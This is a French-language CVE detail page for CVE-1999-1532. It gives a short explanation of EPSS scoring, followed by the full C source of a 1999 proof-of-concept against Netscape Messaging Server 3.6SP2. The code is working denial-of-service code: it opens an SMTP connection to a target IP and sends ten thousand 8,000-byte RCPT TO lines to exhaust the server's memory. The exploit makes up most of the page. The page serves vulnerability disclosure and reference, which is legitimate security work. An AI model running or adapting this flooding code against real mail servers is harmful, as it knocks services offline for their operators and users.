CVE-1999-1532 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

// source: https://www.securityfocus.com/bid/748/info Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. /*************************************************************** You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT whether vulnerable for too much RCPT TO or not. by Nobuo Miwa, LAC Japan 28th Oct. 1999 http://www.lac.co.jp/security/ ****************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define STR_HELO "HELO rcpt2\n" #define STR_MAILFROM "MAIL FROM:rcpt2\n" #define RCPT2_LENGTH 8000 #define RCPT2_NUMBER 10000 int openSocket(struct sockaddr_in *si, char *hostIPaddr) { int port=25, sd, rt ; long li ; struct hostent *he; si->sin_addr.s_addr = inet_addr(hostIPaddr); si->sin_family = AF_INET; si->sin_port = htons (port); sd = socket (si->sin_family, SOCK_STREAM, 0); if (sd == -1) return (-1); rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in)); if ( rt < 0 ) { close(sd); return(-1); } return(sd) ; } void sendRCPT2(int sd) { char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80]; int rt, i; memset( tmpStr, 0, sizeof(tmpStr) ) ; recv( sd, tmpStr, sizeof(tmpStr), 0 ); printf("%s",tmpStr); printf("%s",STR_HELO); send( sd, STR_HELO, strlen(STR_HELO), 0 ); memset( tmpStr, 0, sizeof(tmpStr) ) ; rt = recv( sd, tmpStr, sizeof(tmpStr), 0 ); if ( rt>0 ) printf("%s",tmpStr); printf("%s",STR_MAILFROM); send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0); memset( tmpStr, 0, sizeof(tmpStr) ) ; rt = recv(sd, tmpStr, sizeof(tmpStr), 0); if ( rt>0 ) printf("%s",tmpStr); strcpy( rcptStr, "RCPT TO: rcpt2@" ) ; while ( RCPT2_LENGTH-strlen(rcptStr)>10 ) strcat( rcptStr, "aaaaaaaaaa") ; strcat( rcptStr, "\n" ); for ( i=0 ; i<RCPT2_NUMBER ; i++ ) { printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr)); send( sd, rcptStr, strlen(rcptStr), 0 ); rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 ); strncpy( strn, tmpStr, 60 ) ; if ( rt>0 ) printf("%s \n",strn); } return; } int main (int argc, char *argv[]) { char hostIPaddr[80], *cc, *pfft; int sd = 0; struct sockaddr_in si; printf("You can use ONLY for YOUR Messaging Server 3.6\n"); if (argc != 2) { printf("Usage: %s IPaddress \n",argv[0]); exit(1); } else strcpy (hostIPaddr, argv[1]); sd = openSocket(&si,hostIPaddr); if (sd < 1) { printf("failed!\n"); exit(-1); } sendRCPT2( sd ); close (sd); exit(0); }